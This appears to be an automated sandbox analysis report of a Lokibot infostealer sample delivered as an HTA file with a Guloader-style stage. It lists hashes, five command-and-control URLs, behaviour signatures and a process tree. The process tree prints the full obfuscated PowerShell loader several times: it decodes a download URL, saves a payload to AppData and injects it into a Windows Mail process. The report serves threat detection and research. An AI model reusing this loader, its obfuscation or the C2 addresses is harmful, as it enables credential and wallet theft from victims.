Analysis

  • max time kernel
    94s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 14:29

General

  • Target

    Payment23092024.hta

  • Size

    7KB

  • MD5

    ccd0e2738d0e4b7a59a358232d8a9044

  • SHA1

    1cb60d8d1ba530815f233fc28d809bf884f8b4d0

  • SHA256

    d52690951ad1a5dd386f8157684af0ce56cf54cb0d6ad936c6735371752cb4d2

  • SHA512

    bedcc4a2dbaeea2f222216ad8496ec2eedc4d938f7050bf127c596d4e908974dfb8b5f81ad30e125a713cb702b0723e04dfa28486d71b042b2a325efde595541

  • SSDEEP

    96:bWvaFjbF7xDH6afMy0J+U7AH/wKbSgXd6JHP+bow2GHOnVWtV3UcCzswQ8NhVeJz:+cbFdbEhAH/lf6JL3VWz38zp7Uz

Malware Config

Extracted

Family

lokibot

C2

https://trvtest.click/RF/PWS/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Payment23092024.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5112
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Musiklrernes Renlydens Cheapened Tkkeres #>;$Trontalen='Kitler';<#Tanden Undflyendes Normalteksterne Festivaldeltagerne #>;$Unbladed=$host.PrivateData;If ($Unbladed) {$Forlystelsesliv++;}function Uppercutting($Parenteserne){$Phosphoresced=$Parenteserne.Length-$Forlystelsesliv;for( $skumninger=3;$skumninger -lt $Phosphoresced;$skumninger+=4){$Luskepeter+=$Parenteserne[$skumninger];}$Luskepeter;}function Kollegievrelsers($skumningerndelukkedes){ & ($Taksonomisk) ($skumningerndelukkedes);}$Domesticized=Uppercutting 'MetM OpoPubzKeri KllB nlReja a/spa5B.k. d0Fil V.l( U WDmoiOvenTrad ,loTv wB ssFor adN haTPyn Daf1By.0tve.m t0 B ; sh DeWi siBarnExe6F.e4Eq,;I c Infxska6 Ek4sni;Acr BilrIndvAlb:Bar1 Ar2 Re1Feb.sca0Myo),ap st.G jee ncdihksamoshr/ Cu2Mea0 c,1 Va0Per0Paa1Cou0 pe1 o GrFk nis.lr mee onfThuoHoox Ka/ o1 ,o2 Ta1Pac.fod0Est ';$stollen=Uppercutting ' unuKonsKo EOmaR Ga-sedAReagInteKo nD.st Bo ';$tentamenerne=Uppercutting 'AnshgldtRi tsubp Udssly:Pha/For/Te,dO,rrPtei s,vDdseB.a.samgchwo UnoVakgsoal lbeB,b.semcYdeorugmsal/Unju hcRec?Proe Chx wpNavo GarMeztDug=Grsd GroA.vwskanGullBato onaJomdGo &BagisprdHyp=sho1Ove5,ukNKonn.ocBRetT pupsclZbalb oms crQsagrrimO sflLanZsupEt walysnUnsO cuQ ref Cl9sikWslvW rie LnnUn Rchi_.tabPanI DuiMunmUdve Te ';$Gerbera=Uppercutting 'Pot> a ';$Taksonomisk=Uppercutting 'Di IHare esXOp ';$Ekspeditionsdeltageren='Enaaringens';$denationaliserer = Uppercutting 'PhoeUflcOvehGasof r Ops%BefaAffpFs,pgovd haas mt.ataNit%To,\.riW FoaJani c s ere ur4Ar,5Ga .RepE .pnNi.sTi, .e& rd&T d T,seVr cselhF.uo pp PertUng ';Kollegievrelsers (Uppercutting ' ,p$HaygstalMrko edbImaa A lsti:sanUInin.orgFogrLreesung OvaMosrDipiOato Grust sAannposeMa.s tsTro=Flo(Bo cKr mbjedAfb H a/Thicsp Got$FutdtomeRoln l.a Bit MiiExtoAf.nBa aMislChoiDats seeHyarst.eTilrT l) Al ');Kollegievrelsers (Uppercutting 'und$DiggUptl veo ybwooaskjl Hu: ubRUraeFyrgumeuspia ilrFyraO.tn UntOutimaae mas Bo=Hal$ datOppeLavnRydt ora PomConesinnc,neOwnrV,ln nde c. esFilpPhilProiFlnt.es( Fo$ ltGInfe skrAanbRote,psr Foa ta)pej ');Kollegievrelsers (Uppercutting 'Heg[Ca.N sce R t Va.kils .res drU dvHviiW lcUlteBeaP sioBehi H nRe,tstaM dia FrnMica nqg C.es arUri]Und:U d:BolsH.teMadcP.auFelr reisemtt,nyAppPDonrMouo udtRilo s.cLumo ,elAng u = ea str[AnaNsyne.aat K . s sT seRevc Inu BorAleiFiltMoryF lP HurEm osu t PooPibcUtaoTrel reTU dyFinpLi,eRoe]ves:s,r: ,aT .plTh s Bl1Va 2Ann ');$tentamenerne=$Reguaranties[0];$postconceptive= (Uppercutting 'Ret$ DegmerLEngOGorbMilAT.nlUns:FrycUd.eKopn sktNibrPloAP.al Aui NosQuaeDetRMulIRe,NCavGFolEUnsrRadsThr=kn.nTreeW tw,ab-.ndo .iBsanJPreE AfcsolTKor Asks nYBrsseicT s,EIngMMal.HeanO.pECh t Bi.,orWMa,EKr,BCo CsneLEchi,uheRefnt.rt');$postconceptive+=$Ungregariousness[1];Kollegievrelsers ($postconceptive);Kollegievrelsers (Uppercutting 'Ali$Ec,CBr.espon lotLovrVida .pl Mai FasEstesparHeiiMlknRabgHome LirDrusfal.ForHsube uaEvadTaneR.trEn.sspi[ C $.orsH,ptA noundlConls re F nunt] un=Ela$BroD ,io Ovm Oee ,ns FotH riskecRati H,z AleVeld ac ');$stnnede=Uppercutting 'Koo$ ynCPl eU snAnttEllr MeaKvilKl.i,arsanteG.urTriiElanOedgUnbe iarAktssup.forDBesoMazwTv nUnel,sboN.raBr,dAngFRusi UnlfrseTed(La,$ C tD,se AcnPuetMo aFlomscaeComnNoneGnurFo.nGoteRef,Exc$RamRBedeTreasjlst rtJanysho)ko ';$Reasty=$Ungregariousness[0];Kollegievrelsers (Uppercutting 'Kou$IndGAlfLstuOAflBC.uA ablN a:HypTT ayDa.r ArEascKYupAReeLUd V Q,e uiNLnsEGar=P.o(skrtRetEH rsRomt Du-HjepL aAThut.eih eb P.$O eR Lae D a MasPhat ViYTil)Bl ');while (!$Tyrekalvene) {Kollegievrelsers (Uppercutting 'Phy$Ut gAadlse.oBr.bQuiaR glFl.:Re sBasuKlobT.atIncu.rotAntosenr,ok= mi$DektIdzrmiluFjoeF,r ') ;Kollegievrelsers $stnnede;Kollegievrelsers (Uppercutting 'Airs rutskaastyr Udt ds- losUgal,raeUr eKanpFem hyd4Flu ');Kollegievrelsers (Uppercutting 'Cha$ agg Del aosenbB raTidlXyl:AfgTsa yVinrRkee Unk,dla,lelEmivV leTetnUdreBob=ste( sTs,deForsFi,tove- sdPDeca,fttF,rhO e Dro$ obRU reDeraTrss .etN.eyUnd)nav ') ;Kollegievrelsers (Uppercutting 'Bog$WorgUnglEneotilbUnlaEl,lD,s:KilAf.mmAl,u P sRepgGraoCop=Pht$Af.gtuslCheococbAloasall l:InsP yro Knt Prw D.oKlir,ritT p+ Hy+ rt% ,a$Bu RBese emg reuP oaKonrPrkaBetnsu tOv iLumeRelss l.encc iso Goua vnFr tNat ') ;$tentamenerne=$Reguaranties[$Amusgo];}$reigned=328531;$palpuds=28493;Kollegievrelsers (Uppercutting ' Va$ForgMinl A oDi b iaOdolPra: E GdeceOu.l Del PoyAd, Un =Cir BonGD reEgetP v-.orCKomoNajn.totUndeRu nPoltJul Tra$skiRFereG raTras ertTelyFl ');Kollegievrelsers (Uppercutting 'Udp$Ottg Dal avoHylbHanadisl Pu: AnP TooR csFretTicvBetaRescReac ReimetnGenaOmgtI,diTanosinnsch E p=Zon Dor[ThrsAk y sgsA.ttMileMezm Da.AgnCveroOrdn edvOmdeforr setGes] T.:shu:BapF LurDero ommDiaBDysaLygsRineL r6e e4de,sK ptAlbr smi ncnHo g ve(Ent$CroGLyseTarlNuslA,rysy )Ret ');Kollegievrelsers (Uppercutting 'Paa$sprgTralP,io,edbUndasyvl Ch:sh KOpgn svo rog Apl oe kesKaot,euyBnkkLftk skeE mtHem .ep=Ove sud[ nrsO,vyLnksTr tB ae pam nk.Je T .peAdmx AntPo..FysEHy.nF,ucFo.oH ldEpaimhonOsmg tr] nd:Kla:su,A asKahCInuIGr I G .Te.GT.neAvetHessMint rerfinihomnAntgAff(Ext$R sPN,noV assunt ogv Hea rc,ysc efiGren iab.ntsyni lo Mendis)Hin ');Kollegievrelsers (Uppercutting 'ex $AntgU,dlMino kab Asas.llAnt:AnaFsucoBerdV,ke nrrWireVirt ef=,on$sknKRu n KooKmpgA,pl U eMetsGa tGamy FlkTomkFore VrtBos.Hemsr muAisb Krs Pat,amrslui.eans,ugHaa( a$stur oe U iCongOpsnUnhesa.dski,Ru $ Nep Una E l KrpFluuNondKo ssan)Bes ');Kollegievrelsers $Foderet;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Waise45.Ens && echo t"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ^"powershell.exe^" "<#Musiklrernes Renlydens Cheapened Tkkeres #>;$Trontalen='Kitler';<#Tanden Undflyendes Normalteksterne Festivaldeltagerne #>;$Unbladed=$host.PrivateData;If ($Unbladed) {$Forlystelsesliv++;}function Uppercutting($Parenteserne){$Phosphoresced=$Parenteserne.Length-$Forlystelsesliv;for( $skumninger=3;$skumninger -lt $Phosphoresced;$skumninger+=4){$Luskepeter+=$Parenteserne[$skumninger];}$Luskepeter;}function Kollegievrelsers($skumningerndelukkedes){ & ($Taksonomisk) ($skumningerndelukkedes);}$Domesticized=Uppercutting 'MetM OpoPubzKeri KllB nlReja a/spa5B.k. d0Fil V.l( U WDmoiOvenTrad ,loTv wB ssFor adN haTPyn Daf1By.0tve.m t0 B ; sh DeWi siBarnExe6F.e4Eq,;I c Infxska6 Ek4sni;Acr BilrIndvAlb:Bar1 Ar2 Re1Feb.sca0Myo),ap st.G jee ncdihksamoshr/ Cu2Mea0 c,1 Va0Per0Paa1Cou0 pe1 o GrFk nis.lr mee onfThuoHoox Ka/ o1 ,o2 Ta1Pac.fod0Est ';$stollen=Uppercutting ' unuKonsKo EOmaR Ga-sedAReagInteKo nD.st Bo ';$tentamenerne=Uppercutting 'AnshgldtRi tsubp Udssly:Pha/For/Te,dO,rrPtei s,vDdseB.a.samgchwo UnoVakgsoal lbeB,b.semcYdeorugmsal/Unju hcRec?Proe Chx wpNavo GarMeztDug=Grsd GroA.vwskanGullBato onaJomdGo &BagisprdHyp=sho1Ove5,ukNKonn.ocBRetT pupsclZbalb oms crQsagrrimO sflLanZsupEt walysnUnsO cuQ ref Cl9sikWslvW rie LnnUn Rchi_.tabPanI DuiMunmUdve Te ';$Gerbera=Uppercutting 'Pot> a ';$Taksonomisk=Uppercutting 'Di IHare esXOp ';$Ekspeditionsdeltageren='Enaaringens';$denationaliserer = Uppercutting 'PhoeUflcOvehGasof r Ops%BefaAffpFs,pgovd haas mt.ataNit%To,\.riW FoaJani c s ere ur4Ar,5Ga .RepE .pnNi.sTi, .e& rd&T d T,seVr cselhF.uo pp PertUng ';Kollegievrelsers (Uppercutting ' ,p$HaygstalMrko edbImaa A lsti:sanUInin.orgFogrLreesung OvaMosrDipiOato Grust sAannposeMa.s tsTro=Flo(Bo cKr mbjedAfb H a/Thicsp Got$FutdtomeRoln l.a Bit MiiExtoAf.nBa aMislChoiDats seeHyarst.eTilrT l) Al ');Kollegievrelsers (Uppercutting 'und$DiggUptl veo ybwooaskjl Hu: ubRUraeFyrgumeuspia ilrFyraO.tn UntOutimaae mas Bo=Hal$ datOppeLavnRydt ora PomConesinnc,neOwnrV,ln nde c. esFilpPhilProiFlnt.es( Fo$ ltGInfe skrAanbRote,psr Foa ta)pej ');Kollegievrelsers (Uppercutting 'Heg[Ca.N sce R t Va.kils .res drU dvHviiW lcUlteBeaP sioBehi H nRe,tstaM dia FrnMica nqg C.es arUri]Und:U d:BolsH.teMadcP.auFelr reisemtt,nyAppPDonrMouo udtRilo s.cLumo ,elAng u = ea str[AnaNsyne.aat K . s sT seRevc Inu BorAleiFiltMoryF lP HurEm osu t PooPibcUtaoTrel reTU dyFinpLi,eRoe]ves:s,r: ,aT .plTh s Bl1Va 2Ann ');$tentamenerne=$Reguaranties[0];$postconceptive= (Uppercutting 'Ret$ DegmerLEngOGorbMilAT.nlUns:FrycUd.eKopn sktNibrPloAP.al Aui NosQuaeDetRMulIRe,NCavGFolEUnsrRadsThr=kn.nTreeW tw,ab-.ndo .iBsanJPreE AfcsolTKor Asks nYBrsseicT s,EIngMMal.HeanO.pECh t Bi.,orWMa,EKr,BCo CsneLEchi,uheRefnt.rt');$postconceptive+=$Ungregariousness[1];Kollegievrelsers ($postconceptive);Kollegievrelsers (Uppercutting 'Ali$Ec,CBr.espon lotLovrVida .pl Mai FasEstesparHeiiMlknRabgHome LirDrusfal.ForHsube uaEvadTaneR.trEn.sspi[ C $.orsH,ptA noundlConls re F nunt] un=Ela$BroD ,io Ovm Oee ,ns FotH riskecRati H,z AleVeld ac ');$stnnede=Uppercutting 'Koo$ ynCPl eU snAnttEllr MeaKvilKl.i,arsanteG.urTriiElanOedgUnbe iarAktssup.forDBesoMazwTv nUnel,sboN.raBr,dAngFRusi UnlfrseTed(La,$ C tD,se AcnPuetMo aFlomscaeComnNoneGnurFo.nGoteRef,Exc$RamRBedeTreasjlst rtJanysho)ko ';$Reasty=$Ungregariousness[0];Kollegievrelsers (Uppercutting 'Kou$IndGAlfLstuOAflBC.uA ablN a:HypTT ayDa.r ArEascKYupAReeLUd V Q,e uiNLnsEGar=P.o(skrtRetEH rsRomt Du-HjepL aAThut.eih eb P.$O eR Lae D a MasPhat ViYTil)Bl ');while (!$Tyrekalvene) {Kollegievrelsers (Uppercutting 'Phy$Ut gAadlse.oBr.bQuiaR glFl.:Re sBasuKlobT.atIncu.rotAntosenr,ok= mi$DektIdzrmiluFjoeF,r ') ;Kollegievrelsers $stnnede;Kollegievrelsers (Uppercutting 'Airs rutskaastyr Udt ds- losUgal,raeUr eKanpFem hyd4Flu ');Kollegievrelsers (Uppercutting 'Cha$ agg Del aosenbB raTidlXyl:AfgTsa yVinrRkee Unk,dla,lelEmivV leTetnUdreBob=ste( sTs,deForsFi,tove- sdPDeca,fttF,rhO e Dro$ obRU reDeraTrss .etN.eyUnd)nav ') ;Kollegievrelsers (Uppercutting 'Bog$WorgUnglEneotilbUnlaEl,lD,s:KilAf.mmAl,u P sRepgGraoCop=Pht$Af.gtuslCheococbAloasall l:InsP yro Knt Prw D.oKlir,ritT p+ Hy+ rt% ,a$Bu RBese emg reuP oaKonrPrkaBetnsu tOv iLumeRelss l.encc iso Goua vnFr tNat ') ;$tentamenerne=$Reguaranties[$Amusgo];}$reigned=328531;$palpuds=28493;Kollegievrelsers (Uppercutting ' Va$ForgMinl A oDi b iaOdolPra: E GdeceOu.l Del PoyAd, Un =Cir BonGD reEgetP v-.orCKomoNajn.totUndeRu nPoltJul Tra$skiRFereG raTras ertTelyFl ');Kollegievrelsers (Uppercutting 'Udp$Ottg Dal avoHylbHanadisl Pu: AnP TooR csFretTicvBetaRescReac ReimetnGenaOmgtI,diTanosinnsch E p=Zon Dor[ThrsAk y sgsA.ttMileMezm Da.AgnCveroOrdn edvOmdeforr setGes] T.:shu:BapF LurDero ommDiaBDysaLygsRineL r6e e4de,sK ptAlbr smi ncnHo g ve(Ent$CroGLyseTarlNuslA,rysy )Ret ');Kollegievrelsers (Uppercutting 'Paa$sprgTralP,io,edbUndasyvl Ch:sh KOpgn svo rog Apl oe kesKaot,euyBnkkLftk skeE mtHem .ep=Ove sud[ nrsO,vyLnksTr tB ae pam nk.Je T .peAdmx AntPo..FysEHy.nF,ucFo.oH ldEpaimhonOsmg tr] nd:Kla:su,A asKahCInuIGr I G .Te.GT.neAvetHessMint rerfinihomnAntgAff(Ext$R sPN,noV assunt ogv Hea rc,ysc efiGren iab.ntsyni lo Mendis)Hin ');Kollegievrelsers (Uppercutting 'ex $AntgU,dlMino kab Asas.llAnt:AnaFsucoBerdV,ke nrrWireVirt ef=,on$sknKRu n KooKmpgA,pl U eMetsGa tGamy FlkTomkFore VrtBos.Hemsr muAisb Krs Pat,amrslui.eans,ugHaa( a$stur oe U iCongOpsnUnhesa.dski,Ru $ Nep Una E l KrpFluuNondKo ssan)Bes ');Kollegievrelsers $Foderet;"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2444
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" "<#Musiklrernes Renlydens Cheapened Tkkeres #>;$Trontalen='Kitler';<#Tanden Undflyendes Normalteksterne Festivaldeltagerne #>;$Unbladed=$host.PrivateData;If ($Unbladed) {$Forlystelsesliv++;}function Uppercutting($Parenteserne){$Phosphoresced=$Parenteserne.Length-$Forlystelsesliv;for( $skumninger=3;$skumninger -lt $Phosphoresced;$skumninger+=4){$Luskepeter+=$Parenteserne[$skumninger];}$Luskepeter;}function Kollegievrelsers($skumningerndelukkedes){ & ($Taksonomisk) ($skumningerndelukkedes);}$Domesticized=Uppercutting 'MetM OpoPubzKeri KllB nlReja a/spa5B.k. d0Fil V.l( U WDmoiOvenTrad ,loTv wB ssFor adN haTPyn Daf1By.0tve.m t0 B ; sh DeWi siBarnExe6F.e4Eq,;I c Infxska6 Ek4sni;Acr BilrIndvAlb:Bar1 Ar2 Re1Feb.sca0Myo),ap st.G jee ncdihksamoshr/ Cu2Mea0 c,1 Va0Per0Paa1Cou0 pe1 o GrFk nis.lr mee onfThuoHoox Ka/ o1 ,o2 Ta1Pac.fod0Est ';$stollen=Uppercutting ' unuKonsKo EOmaR Ga-sedAReagInteKo nD.st Bo ';$tentamenerne=Uppercutting 'AnshgldtRi tsubp Udssly:Pha/For/Te,dO,rrPtei s,vDdseB.a.samgchwo UnoVakgsoal lbeB,b.semcYdeorugmsal/Unju hcRec?Proe Chx wpNavo GarMeztDug=Grsd GroA.vwskanGullBato onaJomdGo &BagisprdHyp=sho1Ove5,ukNKonn.ocBRetT pupsclZbalb oms crQsagrrimO sflLanZsupEt walysnUnsO cuQ ref Cl9sikWslvW rie LnnUn Rchi_.tabPanI DuiMunmUdve Te ';$Gerbera=Uppercutting 'Pot> a ';$Taksonomisk=Uppercutting 'Di IHare esXOp ';$Ekspeditionsdeltageren='Enaaringens';$denationaliserer = Uppercutting 'PhoeUflcOvehGasof r Ops%BefaAffpFs,pgovd haas mt.ataNit%To,\.riW FoaJani c s ere ur4Ar,5Ga .RepE .pnNi.sTi, .e& rd&T d T,seVr cselhF.uo pp PertUng ';Kollegievrelsers (Uppercutting ' ,p$HaygstalMrko edbImaa A lsti:sanUInin.orgFogrLreesung OvaMosrDipiOato Grust sAannposeMa.s tsTro=Flo(Bo cKr mbjedAfb H a/Thicsp Got$FutdtomeRoln l.a Bit MiiExtoAf.nBa aMislChoiDats seeHyarst.eTilrT l) Al ');Kollegievrelsers (Uppercutting 'und$DiggUptl veo ybwooaskjl Hu: ubRUraeFyrgumeuspia ilrFyraO.tn UntOutimaae mas Bo=Hal$ datOppeLavnRydt ora PomConesinnc,neOwnrV,ln nde c. esFilpPhilProiFlnt.es( Fo$ ltGInfe skrAanbRote,psr Foa ta)pej ');Kollegievrelsers (Uppercutting 'Heg[Ca.N sce R t Va.kils .res drU dvHviiW lcUlteBeaP sioBehi H nRe,tstaM dia FrnMica nqg C.es arUri]Und:U d:BolsH.teMadcP.auFelr reisemtt,nyAppPDonrMouo udtRilo s.cLumo ,elAng u = ea str[AnaNsyne.aat K . s sT seRevc Inu BorAleiFiltMoryF lP HurEm osu t PooPibcUtaoTrel reTU dyFinpLi,eRoe]ves:s,r: ,aT .plTh s Bl1Va 2Ann ');$tentamenerne=$Reguaranties[0];$postconceptive= (Uppercutting 'Ret$ DegmerLEngOGorbMilAT.nlUns:FrycUd.eKopn sktNibrPloAP.al Aui NosQuaeDetRMulIRe,NCavGFolEUnsrRadsThr=kn.nTreeW tw,ab-.ndo .iBsanJPreE AfcsolTKor Asks nYBrsseicT s,EIngMMal.HeanO.pECh t Bi.,orWMa,EKr,BCo CsneLEchi,uheRefnt.rt');$postconceptive+=$Ungregariousness[1];Kollegievrelsers ($postconceptive);Kollegievrelsers (Uppercutting 'Ali$Ec,CBr.espon lotLovrVida .pl Mai FasEstesparHeiiMlknRabgHome LirDrusfal.ForHsube uaEvadTaneR.trEn.sspi[ C $.orsH,ptA noundlConls re F nunt] un=Ela$BroD ,io Ovm Oee ,ns FotH riskecRati H,z AleVeld ac ');$stnnede=Uppercutting 'Koo$ ynCPl eU snAnttEllr MeaKvilKl.i,arsanteG.urTriiElanOedgUnbe iarAktssup.forDBesoMazwTv nUnel,sboN.raBr,dAngFRusi UnlfrseTed(La,$ C tD,se AcnPuetMo aFlomscaeComnNoneGnurFo.nGoteRef,Exc$RamRBedeTreasjlst rtJanysho)ko ';$Reasty=$Ungregariousness[0];Kollegievrelsers (Uppercutting 'Kou$IndGAlfLstuOAflBC.uA ablN a:HypTT ayDa.r ArEascKYupAReeLUd V Q,e uiNLnsEGar=P.o(skrtRetEH rsRomt Du-HjepL aAThut.eih eb P.$O eR Lae D a MasPhat ViYTil)Bl ');while (!$Tyrekalvene) {Kollegievrelsers (Uppercutting 'Phy$Ut gAadlse.oBr.bQuiaR glFl.:Re sBasuKlobT.atIncu.rotAntosenr,ok= mi$DektIdzrmiluFjoeF,r ') ;Kollegievrelsers $stnnede;Kollegievrelsers (Uppercutting 'Airs rutskaastyr Udt ds- losUgal,raeUr eKanpFem hyd4Flu ');Kollegievrelsers (Uppercutting 'Cha$ agg Del aosenbB raTidlXyl:AfgTsa yVinrRkee Unk,dla,lelEmivV leTetnUdreBob=ste( sTs,deForsFi,tove- sdPDeca,fttF,rhO e Dro$ obRU reDeraTrss .etN.eyUnd)nav ') ;Kollegievrelsers (Uppercutting 'Bog$WorgUnglEneotilbUnlaEl,lD,s:KilAf.mmAl,u P sRepgGraoCop=Pht$Af.gtuslCheococbAloasall l:InsP yro Knt Prw D.oKlir,ritT p+ Hy+ rt% ,a$Bu RBese emg reuP oaKonrPrkaBetnsu tOv iLumeRelss l.encc iso Goua vnFr tNat ') ;$tentamenerne=$Reguaranties[$Amusgo];}$reigned=328531;$palpuds=28493;Kollegievrelsers (Uppercutting ' Va$ForgMinl A oDi b iaOdolPra: E GdeceOu.l Del PoyAd, Un =Cir BonGD reEgetP v-.orCKomoNajn.totUndeRu nPoltJul Tra$skiRFereG raTras ertTelyFl ');Kollegievrelsers (Uppercutting 'Udp$Ottg Dal avoHylbHanadisl Pu: AnP TooR csFretTicvBetaRescReac ReimetnGenaOmgtI,diTanosinnsch E p=Zon Dor[ThrsAk y sgsA.ttMileMezm Da.AgnCveroOrdn edvOmdeforr setGes] T.:shu:BapF LurDero ommDiaBDysaLygsRineL r6e e4de,sK ptAlbr smi ncnHo g ve(Ent$CroGLyseTarlNuslA,rysy )Ret ');Kollegievrelsers (Uppercutting 'Paa$sprgTralP,io,edbUndasyvl Ch:sh KOpgn svo rog Apl oe kesKaot,euyBnkkLftk skeE mtHem .ep=Ove sud[ nrsO,vyLnksTr tB ae pam nk.Je T .peAdmx AntPo..FysEHy.nF,ucFo.oH ldEpaimhonOsmg tr] nd:Kla:su,A asKahCInuIGr I G .Te.GT.neAvetHessMint rerfinihomnAntgAff(Ext$R sPN,noV assunt ogv Hea rc,ysc efiGren iab.ntsyni lo Mendis)Hin ');Kollegievrelsers (Uppercutting 'ex $AntgU,dlMino kab Asas.llAnt:AnaFsucoBerdV,ke nrrWireVirt ef=,on$sknKRu n KooKmpgA,pl U eMetsGa tGamy FlkTomkFore VrtBos.Hemsr muAisb Krs Pat,amrslui.eans,ugHaa( a$stur oe U iCongOpsnUnhesa.dski,Ru $ Nep Una E l KrpFluuNondKo ssan)Bes ');Kollegievrelsers $Foderet;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2300
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Waise45.Ens && echo t"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2108
          • C:\Program Files (x86)\windows mail\wabmig.exe
            "C:\Program Files (x86)\windows mail\wabmig.exe"
            5⤵
              PID:4916
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
                PID:2272
              • C:\Program Files (x86)\windows mail\wabmig.exe
                "C:\Program Files (x86)\windows mail\wabmig.exe"
                5⤵
                • Accesses Microsoft Outlook profiles
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • outlook_office_path
                • outlook_win_path
                PID:2716

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Filesize

        53KB

        MD5

        d4d8cef58818612769a698c291ca3b37

        SHA1

        54e0a6e0c08723157829cea009ec4fe30bea5c50

        SHA256

        98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

        SHA512

        f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmh1s0ko.otp.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Waise45.Ens

        Filesize

        464KB

        MD5

        508486a093581cf2eccc1dafe9ac4d29

        SHA1

        4c4b3df547b73f52806e1880df92cc6823fe76f6

        SHA256

        1554b5ad3b5ca72cd66c6c958b1811a7a780bd0e1bb1bc4c9dbd29bd96e80c55

        SHA512

        9c8613f3baddfaed0424154afafe8ea8ba9afb0cf8cd2596656b4e214c1576534751d37fb5f37eb4c2ab33e3a5b1a1fec51331f815e09c2d76546acb108e5e0a

      • memory/1412-5-0x00000000059C0000-0x0000000005A26000-memory.dmp

        Filesize

        408KB

      • memory/1412-22-0x00000000078E0000-0x0000000007902000-memory.dmp

        Filesize

        136KB

      • memory/1412-6-0x00000000060A0000-0x0000000006106000-memory.dmp

        Filesize

        408KB

      • memory/1412-0-0x00000000708EE000-0x00000000708EF000-memory.dmp

        Filesize

        4KB

      • memory/1412-7-0x0000000006110000-0x0000000006464000-memory.dmp

        Filesize

        3.3MB

      • memory/1412-3-0x0000000005A70000-0x0000000006098000-memory.dmp

        Filesize

        6.2MB

      • memory/1412-17-0x00000000066C0000-0x00000000066DE000-memory.dmp

        Filesize

        120KB

      • memory/1412-18-0x00000000066E0000-0x000000000672C000-memory.dmp

        Filesize

        304KB

      • memory/1412-19-0x0000000007EE0000-0x000000000855A000-memory.dmp

        Filesize

        6.5MB

      • memory/1412-20-0x0000000006C40000-0x0000000006C5A000-memory.dmp

        Filesize

        104KB

      • memory/1412-21-0x0000000007930000-0x00000000079C6000-memory.dmp

        Filesize

        600KB

      • memory/1412-4-0x0000000005820000-0x0000000005842000-memory.dmp

        Filesize

        136KB

